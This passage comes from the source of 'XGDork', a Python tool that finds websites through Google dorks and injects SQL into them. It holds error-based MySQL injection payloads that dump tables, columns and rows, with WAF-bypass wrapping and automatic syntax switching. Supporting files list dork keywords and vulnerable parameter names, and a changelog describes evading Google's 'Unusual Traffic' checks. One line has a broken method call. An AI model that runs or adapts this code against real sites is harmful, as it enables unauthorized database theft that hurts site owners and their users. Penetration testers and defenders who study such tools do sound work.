                        r = requests.get(nurl, headers=headers)
                        data = r.text.encode('utf-8')

                        tmp = str(parserDump(data, 1))
                        tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                        if (tmp != ''):
                            tmp_l += " "
                            tmp_l += tmp

                        j += 1

                    if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
                        stress = 1

                    if (tmp_l != ''):
                        data_s_list.append(tmp_l)

                    i += 1
            else:
                data_s_list = parserDump(data, 0)
        else:
            data_s_list = parserDump(data, 0)

        if (len(data_s_list) > 0):
            print (str(data_s_list))
            return data_s_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)

    elif (modx == 2):
        insertFields = turing_fields(fields)
        while (stress == 0):
            nurl = burl
            if (error_syntax == 0):
                nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(0x28,0x5e,0x23,0x5e,0x29,CONCAT("+str(insertFields)+") AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')
            if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.din("Not found") > -1 and data.find("(^#^)") == -1):
                stress = 1
                error_syntax += 1
                i = 0
            else:
                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                if (tmp != ''):
                    data_s_list.append(tmp)
                else:
                    stress = 1

            i += 1
        if (len(data_s_list) > 0):
            print (str(data_s_list))
            return data_s_list

        print colored(" [*] Change syntax ... ", 'cyan')
        stress = 0
        i = 0
        while (stress == 0):
            j = 0
            while (j < len(fields)):
                nurl = burl
                if (error_syntax == 1):
                    nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
                elif (error_syntax == 2):
                    nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(table)+"="+str(dbx)+"."+str(table).encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
                elif (error_syntax == 3):
                    nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM "+str(dbx)+"."+str(table)+" GROUP BY x)a) --"

                if (waf == 1):
                    nurl = sbws(nurl)
                #print (nurl)
                r = requests.get(nurl, headers=headers)
                data = r.text.encode('utf-8')

                if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Error in SQL Query") > -1 and data.find("(^#^)") == -1):
                    print colored(" [*] Change syntax ... ", 'cyan')
                    error_syntax += 1
                    i = 0

                else:
                    tmp = str(parserDump(data, 1))
                    tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                    tmp_l += " "
                    tmp_l += tmp

                j += 1

            if (data.find("(^#^)") == -1):
                stress = 1
            if (tmp_l != ''):
                data_s_list.append(tmp_l)
                tmp_l = ""
            else:
                stress = 1

            i += 1

        if (len(data_s_list) > 0):
            print (str(data_s_list))
            return data_s_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)





def MOCA (url, param, mod, table, fields):
    tmpfile = file
    su = []
    nc = 0
    idx = 0
    modx = 0
    waf = 0

    if (mod == 1):
        IP_PO = ipuser()
        print colored(" [*] Public IP overview: "+IP_PO, 'blue')

        su = stress_url(url, param)
        if (su[1] == 1):
            nc = count_nc(url, param, su[0])
            idx = id_checker(url, param, su[0], nc)
            dumpDatabase(url, param, su[0], su[1], nc, idx)
        elif (su[1] == 2):
            dumpDatabase(url, param, su[0], su[1], 0, 0)
        elif (su[1] == 3):
            nc = heuristic_nc(url, param, su[0])
            idx = id_checker(url, param, su[0], nc)
            dumpDatabase(url, param, su[0], 1, nc, idx)

    elif (mod == 2):
        tmpfile = open("tmpfile", 'r')
        modx = int(tmpfile.readlines()[0].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        waf = int(tmpfile.readlines()[1].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        nc = int(tmpfile.readlines()[3].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        idx = int(tmpfile.readlines()[4].replace('\n', ''))
        tmpfile.close()

        dumpTables(url, param, waf, modx, nc, idx)

    elif (mod == 3):
        tmpfile = open("tmpfile", 'r')
        modx = int(tmpfile.readlines()[0].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        waf = int(tmpfile.readlines()[1].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        nc = int(tmpfile.readlines()[3].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        idx = int(tmpfile.readlines()[4].replace('\n', ''))
        tmpfile.close()

        dumpColumns(url, param, waf, modx, nc, idx, table)

    elif (mod == 4):
        tmpfile = open("tmpfile", 'r')
        modx = int(tmpfile.readlines()[0].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        waf = int(tmpfile.readlines()[1].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        nc = int(tmpfile.readlines()[3].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        idx = int(tmpfile.readlines()[4].replace('\n', ''))
        tmpfile.close()
        tmpfile = open("tmpfile", 'r')
        dbx = str(tmpfile.readlines()[2].replace('\n', ''))
        tmpfile.close()

        dumpData_s(url, param, waf, modx, nc, idx, table, fields, dbx)


--------------------------------------------------------------------------------
/gd_data.txt:
--------------------------------------------------------------------------------

'
1
5
55
--------------------------------------------------------------------------------
/gd_ext.txt:
--------------------------------------------------------------------------------
.php?
.php*
--------------------------------------------------------------------------------
/gd_keywords.txt:
--------------------------------------------------------------------------------

book
article
shop
shopping
--------------------------------------------------------------------------------
/gd_namespage.txt:
--------------------------------------------------------------------------------
index
/index
article
/article
articles
/articles
page
/page
pages
/pages
prod
/prod
product
/product
products
/products
products_list
productslist
/products/list
content
/content
/content/item
detail
/detail
details
/details
board
/board
view
/view
store
/store
/store/products/product
new
/new
news
/news
/news/item
item
/item
items
/items
rss
/rss
book
/book
bookpage
/bookpage
bookpages
/bookpages
view-item
/view-item
cart
/cart
view-cart
/view-cart
shop
/shop
shopping
/shopping/items
add
/add
add-cart
/add-cart
author
/author
view-author
/view-author
forum/view
/forum/viewtopic
topic
/topic
--------------------------------------------------------------------------------
/gd_params.txt:
--------------------------------------------------------------------------------
id=
ID=
iD=
Id=
cat=
CAT=
catid=
catID=
CATid=
CATID=
cat-id=
cat_id=
cat_ID=
cat_Id=
cPath=
ref=
page=
prod=
prodid=
prod_id=
product_id=
pid=
bookid=
book-id=
book_id=
num=
id_num=
cid=
CID=
cID=
Cid=
--------------------------------------------------------------------------------
/version.txt:
--------------------------------------------------------------------------------

--- XGDork ---

version : final-1.0k2 FreeSoftware
Final-open

--- ------ ---

'agents.txt' file made by SQLmap Dev/team
SQLmap - https://github.com/sqlmapproject/



--- UPDATES ---

(Update coming soon...)

[final-1.0k2]
- Fix SPGKey Error for Bypass mode

[final-1.0k]
- Fix SPGKey Error for Bypass mode

[final-1.0]
- Some corrections
- Minor modifications
- Added various options
- Added simple tools
- Program aesthetics
- Added various additional information

[b0.9.0]
- Added various information
- Program aesthetics
- Some corrections, minor modifications
- Added 'forcing' option, additional tests, simple WAF detection ...
- Added 'timeout' option, allows defining a timeout for Requests when reading the received data
- If your list is not empty before detecting 'Unusual Traffic', then the program will go on to the next step


[b0.7.2] - (MetaTuring)
- SearchEngine greatly enhanced
- New Google Secure 'Unusual Traffic' Bypass, efficient and stable
- Parsers improved
- Some corrections
- Removal of 'Spoof-dorks', obsolete and no longer useful

[b0.6.0]
- Parsers improved
- Fix range() option in bypass mode
- Added the 'Dumper' module, 'naif', generic for MySQL >= 5.

[b0.5.0 (dev)]
- Dumper rewrite
- Dumper enhancement > syntax change during the attack if needed.

[b0.3.0 (dev)]
- Added a 'Dumper' module > tries to inject automatically via 'a simple SQL attack'; if the result is positive, it allows dumping the database (MySQL >= 5) of the site in question.
- Simple attack "Error-Based 'Unknown WHERE CLAUSE'"

[a1.0.7]
- Improved Bypass > added a 'rand_domain', integrated.
- SearchEngine enhancement > 'customdomain' option allows you to manually define a Google domain, by default: '.com'
- SearchEngine enhancement > option 'range ()' sets the start and end of the search
- Various improvements / modifications ...
- General optimization ...

[a.1.0.3]
- Argument support rewritten (flexible, easy to add new modules or options ...)
- Added Bypass mode (simple)
- Code optimized

[a.0.8.0 (dev)]
- Added Bypass mode (primitive)
- Improved SQL Parser
- Quote change from "'" to "%% 2727"
- Improved SearchEngine and Parser
- Improved URL filter

[a0.7.5]
- First version shared
- Code rewritten
- Overall improvements

[Prototype (dev)]
- basic functions, primitive ...



--------------------------------------------------------------------------------